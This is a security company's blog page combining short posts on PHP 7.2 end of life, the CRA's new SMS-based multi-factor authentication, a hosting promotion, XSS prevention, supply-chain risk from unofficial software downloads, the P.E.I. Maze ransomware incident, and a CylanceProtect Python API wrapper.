Justin Robinson

PHP7.2 End of Life and the OWASP® ModSecurity Core Rule Set (CRS)

OWASP

On November 30th, PHP 7.2 went end of life (EOL). When end of life occurs the product becomes no longer supported and quickly can become a security issue when zero days are found and security patches are not delivered. None of Rogue Security customers currently uses this version of PHP so we’ve taken the needed step of uninstalling  PHP 7.2 from all of our website hosting servers; after validation we can confidently say that the change was successful.

You can always come back here to find the link to the list of Current PHP Supported Versions, and we’d recommend you also check out Migrating from PHP 7.2.x to PHP 7.3.x. PHP 8.0, the next major release, will be available at Rogue Security on December 18th, 2020.

Here is a complete list of modules that are no longer available.

Over the course of future posts we’ll introduce you to many different aspects of OWASP (Open Web Application Security Project). One of our principle website hosting security features in the OWASP® ModSecurity Core Rule Set (CRS) which is a set of generic attack detection rules for use with ModSecurity or other compatible web application firewalls. So what does this mean? Well, it means that you have the best protection against the top web application attacks known. Now, that’s impressive. Find out more at coreruleset.org.

Government of Canada Quietly Rolls Out Multi-Factor Authentication

Authentication

I don’t quite know when, but the Government of Canada seems to have quietly rolled out multi-factor authentication (MFA) on its CRA portal. I expect this happened at sometime within the last week, at least for me it did. The only information I found on their website is detailed in this post.

This new service, named GCVerify, is a phone/SMS-based MFA solution that is now required after logging in to your CRA Account with either your GCKey credentials or Sign-In Partner.

If it’s the first time that you’ve logged in since the implementation you’ll be walked through setting up MFA by providing your phone number. You’ll receive a code via telephone call or SMS to confirm your identity.

InfoSec Check

Identity Validation

This identity validation confirms that your phone number should be associated with your username.

You should never allow anyone to access your telephone or text messages. A threat actor with access to your text messages can bypass text message based two-factor authentication (2FA) very easily. If given the choice, you should use a 2FA application such as Google Authenticator.

After your setup you’ll be prompted to enter a one-time passcode every time that you login to CRA account. This includes both Personal and Business accounts.

Multi-factor Authentication page on the Government of Canada CRA Login
Multi-factor Authentication page as seen during the Government of Canada CRA Login

The Personal Information Collection Statement page, has also been updated (third paragraph) to reflect the changes, although the information itself leaves little to be desired. I’ve copied the specific paragraph that talks specifically about multi-factor authentication, below.

We have a multi-factor authentication process for our online services. We collect the telephone number (landline or cell), method of delivery of the one-time passcode (telephone call or Short Message Service (SMS)) and language of choice to receive the one-time passcode that you provide when enrolling in multi-factor authentication. We share this information with the third party responsible for generating and sending you the code. The code you enter is also shared with the third party to ensure it matches before allowing you access to our online services.

It doesn’t specifically mention which vendor, however, when I dug through the Public Works and Government Services Canada website, I came accross a tender notice title: Invitation to Qualify (ITQ) Identity and Access Management (IdAM) Software Solution, posted 2020/06/22, that has several mentions of multi-factor authentication. A bit of an assumption but I wasn’t able to find anything that was any more relevant. It lists N7030:ADP Software as the Goods and Services Identification Number (GSIN).

This is definitely a step forward, but hopefully not a stopping point for the Government of Canada. As mentioned, phone-based and SMS-based MFA does have it’s own issues, but at least it’s something, right? The fact that it’s enforced on each and every login is great, and the tokens definitely timeout, although I’m unsure of how long that timeout is. But, you can’t currently manage any part of that service, so if you want to update your telephone number you will have to contact the CRA helpdesk at 1-800-959-8281.

And no, you can’t disable it. But, I wouldn’t suggest that you did anyway.


Additional Resources:

Multi-factor authentication to access CRA login services

Introducing $7 Business Website Hosting

Server Racks

Your website is a target. It’s a target for both your clients to find information about your business, and those who wish to do your business and its interests harm. This has never been more true than in 2020. Covid-19 has sent many businesses to a work-at-home model and so many people are living their lives at home more.

Rogue Security envelops the C.I.A. triad in every product and service that we develop, and our Business Website Hosting service was no exception. This focus on ConfidentialityIntegrity, and Availability ensures that your business website is accessible, and secure, from the ground up.

Website Hosting Made Simple

Using WordPress Toolkit you can get your business website up and running quickly. WordPress Toolkit is a cPanel plugin allowing you to install, update and manage your WordPress installation without logging into it. The AutoSSL requests and installs a Let’s Encrypt signed SSL Certificate for any of your domain names quickly and easily, at no additional cost!

Warrantied SSL Certificates are also available for purchase.

Always Available and Protected

Our priority is keeping your website available to your current and future customers. We provide a 99.99% uptime guarantee, with approximately 1 minute of downtime per week for maintenance restarts. We know security. The OWASP (Open Web Application Security Project) ModSecurity™ CRS (Core Rule Set) is a set of rules that protect our servers and increase the amount of protection greatly.

The Tools You Need

With complete access to cPanel you have all of the tools that you need to build a beautiful, accessible website for your business.

Sign-Up Now

Please contact hosting@roguesecurity.ca for more information and to sign-up.

Cross Site Scripting Attacks On Your Company Website and How to Protect Against Them

Your business’ website and the domain (.com, .ca, .net, etc..) that goes along with it, is an important part of the identity of your organisation and is slowly becoming the first place that consumers will go to find out more about who you are and what you do. The last thing that you want, especially during an already strained moment in the world’s economy, is for a potential client to receive an ad or get redirected to another website when visiting yours.

Cross-site Scripting Vulnerability
There are many ways for an attacker to take advantage of you through your website including a technique called Cross-Site Scripting or XSS for short-hand. A XSS vulnerability allows an attacker to insert (or inject) a piece of code into your website. One intended result from this action is that the code is then displayed to your visitors in the form of ads, malware, or just about anything else. In effect, the attacker is using your website as a median to deliver malicious content to unsuspecting visitors.

A XSS vulnerability exists when an input on your website doesn’t properly validate or sanitize the data given to it prior to that data being used in an output. These inputs might include contact forms, shopping carts, and login forms. Essentially, any point of data entry on your website can be the target of a XSS attack.

Protecting Against XSS Vulnerabilities
The most effective manor of protecting against a XSS vulnerability is by not allowing your visitors to use any special characters (<,>,/,\,,,!,&,etc) when entering data on your website. HTML encoding is the most common method for ensuring that HTML characters are converted output in safer manner. XSS vulnerabilities can be identified during development by using both Static and Dynamic Application Security Testing (DAST) techniques, and should be remediated prior to pushing code to production.

Many websites, including this one, rely on a Content Management System (CMS) to manage and display content. WordPress and Drupal are just a couple of examples of what a CMS is. When using a CMS you willl rely on plug-ins to provide functionality like contact forms, and while you can’t know with 100% certainty what security controls were used in the development of the plug-in, you do have the ability to keep them updated with the latest software patches. Your CMS will allow you to update your plug-ins through its distinct administration dashboard. WordPress 3.7 introduced the capability to turn automatic update plug-ins, but it needs to be turned on!

Resources
OWASP – Cross Site Scripting (XSS)

How Hackers Use Free Software To Spread Malware

Bad Microsoft Store Downloads

In a world where the Covid-19 virus is dominating and forcing businesses to shudder or employees to work from home, technology companies are stepping up in a big way to offer many of their services and products at reduced or no cost. This has made the forced transition to a primarily remote work force easier in so many regards, but it also adds an element of risk that some companies aren’t necessarily thinking about these days and I can’t blame them.

To understand the risk that software plays, it’s important to understand the multitude of ways that a bad actor can take advantage of companies offering free software to spread malware and possibly steal your data. When we talk about this type of risk we’re often talking about third-party risk. It’s third-party because you often don’t have the same control over the software as something that you might have developed in house.

Understanding the Software Supply-Chain

If you look at any piece of enterprise software in 2020 it will almost certainly be built with a number of frameworks like .NET, Node JS, and Ruby on Rails. These frameworks can save thousands of hours of development time by providing libraries of predefined code. In using these frameworks, you are likely NOT reviewing the code yourself, but are relying on the developers of these libraries to ensure that vulnerabilities don’t exist in their code.

A physical example of a supply-chain attack was the Target breach. A bad actor was able to take advantage of a flaw in the software of Target’s HVAC vendor. The vendor software that was running on the Target network had a vulnerability that allowed the bad actor to enter the network. Once inside the network they only need to find a way to move laterally to more important computers with more important information on them.

Free Software Makes Supply-Chain Attacks Easier

I love free software as much as the next guy, just make sure that you’re getting it from an appropriate source. A quick search on the very own Microsoft Store brought up a number of free software that was being peddled for cash (seen in the picture above). These are NOT official releases of this software, but they are certainly easier to access for any Windows user then the official. Here are the actual and safe links, for your information.

https://www.qbittorrent.org/
http://www.darkaudacity.com/
https://www.smplayer.info/
https://pwsafe.org/

There is simply no guarantee that the above publisher didn’t modify the software in some way that could track you, or steal data. In so many cases these publishers use Adware to make a quick buck.

Protecting Yourself

  • Track any third-party code or relationships to ensure that security releases are applied when appropriate. This might be as simple as an Excel spreadsheet or as complex as an entire third-party risk management department.
  • Always download software from official sources. A quick Google search of the software will often bring up the appropriate website as the first result.
  • Eliminate the human factor by providing employees with security awareness training on a regular basis.

Prince Edward Island Data Breach: Synopsis and Opinion

Ransomware

Ransomware is hitting governments hard. Besides the event that Prince Edward Island experienced, the Canadian territory of Nunavut also experienced a ransomware attack in November of 2019 that crippled systems within that entire government.

Ransomware is a type of Malware that, when introduced to a system, can lock the user out of local system files. The ransomware enumerates through the directories on a victim’s computer to build a file hierarchy of the device. Once a list of files is built, the ransomware uses Windows own cryptography API to encrypt the files (in most cases). The encryption keys are then sent back to the attacker for long-term storage and where you can’t access them.

Earlier iterations of many ransomware strains focused on spread and relied on quantity of infections to drive a successful campaign. This was the case with Wannacry and NotPetya whereby the intent was to cripple the victim into paying the ransom. Newer ransomware is using a level of human control that amounts to an attacker silently having control of a victim network prior to the attacker locking out the system files. What this has allowed is for the attacker to ex-filtrate data from the victim’s system. So not only is the victim locked out of their files, but the attacker also has a copy of any number of those same files to hold over you.

Paying the ransom is not the answer to ransomware. Paying the ransom only perpetuates the effectiveness of ransomware and conditions the attackers to continue the attacks. Ransomware has become big business for these attackers. Unfortunately, the obvious result of not paying the ransom is that your files will likely be released to wider audiences. Prevention should be the number one focus, but having strong incident response and business continuity/disaster recovery plans that include an approved and well structure communications plan is also essential.

Regardless of whether you pay the ransom or not, it should be assumed that the data will eventually be released. Without consignment it’s simply impossible to know otherwise.

The P.E.I. Ransomware

The Prince Edward Island government was impacted by a ransomware called Maze. Maze has been attributed to Threat Actor 2101, or simply TA2101, by Proofpoint. This ransomware is notable for its use of publishing ex-filtrated files to the internet via their website if victims don’t pay instead of selling the data on dark web forums.

In addition, threat actors can use this trove of data to phish other businesses, which should definitely be a big concern for P.E.I. businesses.

Timeline

2020-02-23 — The government reported a 90-minute ransomware incident before it was contained. At that time the province did not believe that any Islanders’ personal information had been affected.

2020-03-03 — Government documents began showing up online when approximately 800MB (uncompressed) of data showed up on Internet. According to the Maze ransomware website, they have approximately 200GB of archives.

What’s Next?

The inevitability of the release of the rest of the files can’t prevent recovery, which will almost certainly involve a hard look at the information security of the province. A forensics audit will need to take place in order to determine the extent of files that may have been accessed. Communications will then need to take place to any impacted individuals and businesses so that they may take appropriate actions, if deemed necessary.

Both CreditKarma and Borrowell offer free credit scores and credit reports every quarter. Freezing your credit can be done by calling all major credit bureaus.

A recent article by Forbes stated that the average cost of a ransomware incident has skyrocketed to over $84,000. This is likely on the low-end as most incidents go unreported and there is no clear measurement baseline for what ransomware incident costs should include. The ransomware attack on the City of Atlanta could have cost tax-payers an estimated $17 million dollars, but I wasn’t able to find any exact numbers. It’s not infeasible to suggest that this incident may cost the P.E.I. government over $1 million dollars when all is said and done.

CylanceProtect API Wrapper in Python3

Open Source

CylanceProtect is an artificial intelligence based anti-virus solution that is now owned by Blackberry.

A few years ago I wrote a Python3 wrapper for the CylanceProtect API. It’s not well testing, but fairly well documented. Feel free to check it out on Github and modify it as you see fit.

CyPyAPI was designed as an object oriented class so you’ll simply need to instantiate the object with the required connection settings, and then call whatever methods that you wish.

import cypyapi

# Create a new CyPyAPI object
cypiapi_object = CyPyApi(Tenant_ID, App_ID, App_Secret)

# Now call whatever method that you wish.
users = cypiapi_object.get_users()

It’s as simple as that.

Check out the code over on GitHub.